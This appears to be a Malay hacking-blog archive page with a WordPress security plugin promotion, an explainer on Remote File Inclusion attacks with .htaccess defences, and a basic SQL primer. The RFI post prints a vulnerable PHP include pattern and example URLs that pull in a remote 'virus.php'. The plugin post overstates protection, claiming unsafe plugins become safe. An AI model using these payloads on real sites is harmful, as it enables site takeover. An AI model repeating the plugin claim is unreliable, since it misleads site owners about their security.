Showing posts with label SQL. Show all posts
Showing posts with label SQL. Show all posts

Hide My WP! 95% selamat dari SQl injection dan Serangan Xss.


Assalamualaiikum dan selamat sejahtera.
Wordpress merupakan salah satu platform yang sangat popular pada masa kini.Penggunaan wordpress sangat luas, ada yang mengunakan wordpress sebagai blog, ada juga yang mengunakan wordpress sebagai tapak untuk laman sesawang rasmi ataupun peribadi.

Pada hakikatnya, ramai pengguna ingin menyembunyikan penggunaan wordpress mereka, ini kerana terdapat pelbagai bugs pada plugin atau tema wordpress.Untuk memastikan ianya sentiasa selamat, kita mungkin tiada masa untuk menyemak atau mengemas kini plugin setiap hari.


Kini anda boleh mencuba plugin Hidemy WP sebgai salah satu cara meningkatkan keselamatan sistem wordpress anda.Baru baru ini, kita boleh lihat serangan besar besaran pengodam terhadap laman laman yang digodam adalah kebanyakannya menggunakan sistem dari wordpress. diantara botnet yang paling agresif yang pernah dilihat

Tingkatkan keselamatan anda
Hidemy WP mengawal akses WP kepada fail PHP. Ia melindungi laman web anda 95% daripada SQL Injection dan serangan XSS. Ini bermakna anda boleh memasang plugin yang tidak selamat tanpa bimbang tentang keselamatan terutama kepada ancaman penggodam, spam dan robot yang selalu menyerang pengguna WordPress.

Ketahui lebih lanjut bagaimana ia berfungsi DISINI | lihat live demo DISINI
Jika anda ingin muat turun secara percuma, sila klick pada button download dibawah:


Jangan Lupa untuk terus bersama kami untuk info info terbaru di facebook GilerHackers DISINI.

Hack Dengan Kaedah RFI [Remote File Inclusion ] Bagaimana ia berfungsi?

Assalamualaiikum dan selamat sejahtera.RFI atau Remote file inclusion sekarang menjadi salah satu kaedah yang selalu digunakan penggodam selain kaedah suntikan SQL.Jadi kami di [GH] cuba mencari info bagaimana ia berfungsi.

"Remote file inclusion" atau lebih mesra dikenali sebagai "R.F.I" adalah salah satu serangan terhadap laman web dengan membolehkan pihak penyerang menjalankan skrip atau aturcara mereka tersendiri. Kesannya bergantung kepada jenis skrip yang dimasukkan oleh pihak penyerang.

Sekiranya mereka menjalankan aturcara membuang pangkalan data, maka ke semua laman web anda tidak dapat dijalankan memandangkan pangkalan data anda sudah dibuang.

Akhirnya, anda terpaksa mengembalikan pangkalan data yang telah disalin sebelum ini bagi membolehkan laman web berjalan semula seperti biasa. Sehubungan dengan itu, anda boleh gunakan artikel ini sebagai panduan untuk menyelamatkan laman web dari digondam melalui cara ini seandainya anda menggunakan skrip laman web tersendiri. Jika menggunakan CMS, tidak perlu risau mengenainya.

Cara Serangan RFI
Kaedah serangan RFI ini sebenarnya bergantung kepada cara penulisan skrip anda di laman web yang telah dikesan oleh pihak penyerang.

Untuk melakukan penyerang perlu tahu secara lengkap skrip yang anda jalankan. Berikut adalah antara contoh aturcara laman web anda yang telah membuka ruang kepada penyerang dan semestinya dijalankan pada pelayan yang menggunakan PHP.
include($page . '.php');

Aturcara di atas dituliskan dalam satu fail .php yang bakal memproses maklumat yang dihantar contohnya satu laman web borang, selepas diklik butang "Hantar", semua maklumat yang dimasukkan oleh pengguna akan ditujukan ke laman ini. Katakan nama fail tersebut adalah index.php.

Maka selepas diklik butang "Hantar", alamat URL di pelayar web (web browser) akan bertukar menjadi seperti ini:
http://www.websaya.com/index.php?page=arkib

Di mana, bahagian aturcara di dalam index.php akan ditukarkan kepada pembolehubah yang dinyatakan dalam URL menjadi seperti ini:
include('arkib.php');

dan secara tersendirinya, fail index.php akan memanggil fail arkib.php ke dalamnya dan proses seterusnya dijalankan. Oleh kerana pembolehubah $page dalam index.php tidak dinyatakan nilaian asal (default) maka pengondam akan menggunakan pembolehubah ini untuk memasukkan nilaian dari laman web yang lain. Contohnya:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php

dan di bahagian index.php pula, pembolehubah include akan menafsirkan nilaian tersebut menjadi seperti ini:
include('http://www.weblain.com/virus.php.php');

Tetapi oleh kerana pihak pengondam tidak mengetahui secara lengkap apakah jenis sambungan yang anda akan tetapkan, jadi mereka akan meletakkan tanda "?" dibelakang alamat URL bagi membolehkan aturcara dibahagian pelayan melepaskan fail tersebut untuk diproses.

Tanda "?" membawa maksud supaya pihak pelayan (server) menentukan sendiri bentuk fail tersebut. Sekiranya sambungan yang telah ditetapkan adalah .php, maka dengan sendiri fail tersebut dilepaskan.

Sekiranya sambungan dibahagian include ditetapkan kepada .ini berbanding .php seperti include($page . '.ini'); maka "?" akan menjadikan sambungan seterusnya sebagai pembolehubah yang lain. Sebagai contoh:
include($page . '.ini');

dan "URL injection" yang dimasukkan adalah seperti ini:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php?

maka, proses yang berlaku di dalam index.php adalah:
include('http://www.weblain.com/virus.php?.ini');

pada asalnya, bagi menjalankan aturcara, pengondam seharusnya menggunakan sambungan fail .ini. Tetapi pihak pembangunan telah meletakkan sambungan .ini berbanding .php. Oleh kerana kehadiran "?", maka dibahagian pelayan (server) tetap menjalankan proses dengan memanggil fail tersebut walaupun sambungan berlainan kerana tanda "?" menjadikan sambungan .ini sebagai satu pembolehubah yang lain.

Dengan ini, fail virus.php tersebut dengan sendirinya akan dimasukkan ke dalam index.php dan dijalankan. Seterusnya akan merosakkan laman web anda mengikut aturcara yang ditulis oleh pihak pengondam.

Kenapa serangan ini boleh dijalankan
register_global dihidupkan. register_global membolehkan PHP mengambil secara pembolehubah yang dinyatakan di dalam URL tanpa melalui proses tapisan sekuriti terlebih dahulu. Oleh sebab itu, kebiasaanya untuk pelayan-pelayan web (server) yang baru, fungsi ini dimatikan secara asalnya.

allow_url_fopen
dihidupkan. Fungsi ini membenarkan PHP untuk memasukkan sebarang maklumat atau membuka ruang untuk kemasukkan fail yang lain dari domain yang asal (kiranya memasukkan fail dari tempat yang lain). Oleh sebab itu, dalam versi PHP 5.2, fungsi ini telah diubahsuai dan diasingkan yang mana untuk fungsi include(), allow_url_include telah diwujudkan dan tetapan ini telah dimatikan secara sendirinya.

Cara mengatasi serangan RFI
Terdapat beberapa cara yang boleh kita lakukan untuk mengatasi dan melindungi laman web dari terkena serangan ini tetapi di sini saya cuma tunjukkan satu cara sahaja iaitu dengan menggunakan .htaccess fail. Sebelum itu, perlu pastikan bahawa pelayan menyokong "mod_rewrite"

Dengan menggunakan arahan di bawah ini, ia akan memeriksa sebarang permintaan yang datang dari URL luaran iaitu http://, https:// dan ftp://
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)

Seterusnya dengan memasukkan kod di atas di dalam .htaccess dan diikuti dengan beberapa arahan lain seperti:
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)
RewriteRule ^(.+)$ - [F]

Seandainya anda mempunyai akses terus ke dalam pelayan untuk mengendalikan beberapa modul-modul server, anda boleh gunakan arahan ini:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [env=rfi:true]
</IfModule>
CustomLog /path/to/logs/rfi.log combined env=rfi

Sumber Rujukan

Panduan Asas: SQL (Structured Query Language)

SQL (disebut "ees-kue-el") membawa maksud Structured Query Language. SQL digunakan untuk melakukan perhubungan dengan pangkalan data. Berdasarkan kepada ANSI (American National Standard Institute), ia merupakan bahasa pengaturcaraan piawai untuk melakukan perhubungan dan komunikasi menerusi pengurusan sistem pangkalan data.

Penyata SQL digunakan untuk melakukan tugasan seperti mengemas kini data dalam pangkalan data, atau memanggil data-data daripadanya. Beberapa jenis pangkalan data yang sering digunakan adalah seperti Oracle, Sybase, Microsoft SQL Server, Access dan Ingres.

Kebanyakan sistem pada hari ini menggunakan SQL sebagai alatan untuk menyimpan data dan maklumat namun setiap satunya mungkin mempunyai sambungan fungsi yang berlainan bergantung kepada keperluan. Setiap sambungan fungsi ini dipanggil dan dilaksanakan dengan penyata SQL tertentu.

Namun penyata yang sering dan biasa digunakan adalah seperti "SELECT", "INSERT", "UPDATE", "DELETE", "CREATE" dan "DROP". Penyata-penyata ini membolehkan kebanyakan tugasan dilakukan kepada pangkalan data.

Dalam tutorial SQL, anda akan didedahkan kepada cara penggunaan, penyata SQL dan langkah-langkah untuk mengadaptasi setiap kod aturcara bagi mencapai data-data daripada pangkalan data.

Apa itu SQL

  • SQL adalah akronim untuk Strcutured Query Language
  • SQL membenarkan anda mencapai pangkalan data.
  • SQL adalah ANSI standard.

Apa yang SQL boleh lakukan?

  • SQL boleh memproses arahan terdapat pangkalan data
  • SQL boleh mengambil data dari pangkalan data
  • SQL boleh memasukkan data ke dalam pangkalan data
  • SQL boleh mengubah data dalam pangkalan data
  • SQL boleh memadam data dalam pangkalan data
  • SQL boleh membuat pangkalan data yang baru
  • SQL boleh membuat jadual baru dalam pangkalan data.
  • SQL boleh menyimpan set-set arahan dalam pangkalan data.
  • SQL boleh membuat 'view' untuk pangkalan data.
  • SQL boleh membenarkan sebahagian pengguna sahaja yang dapat melihat pangkalan data.

SQL dan Laman Web Anda

  1. Untuk membina laman web yang mempunyai pangkalan data, anda memerlukan RDBMS seperti (Ms Access, SQL Server, MySQL)
  2. Bahasa pengaturcaraan seperti PHP dan ASP
  3. SQL
  4. HTML/CSS
 

© Copyright 2013 [GH] GilerHackers! All Rights Reserved.
Beo v.3 Themes Design by BukhariMalek | Contact On Facebook Diselenggara Oleh: IdeaKreatif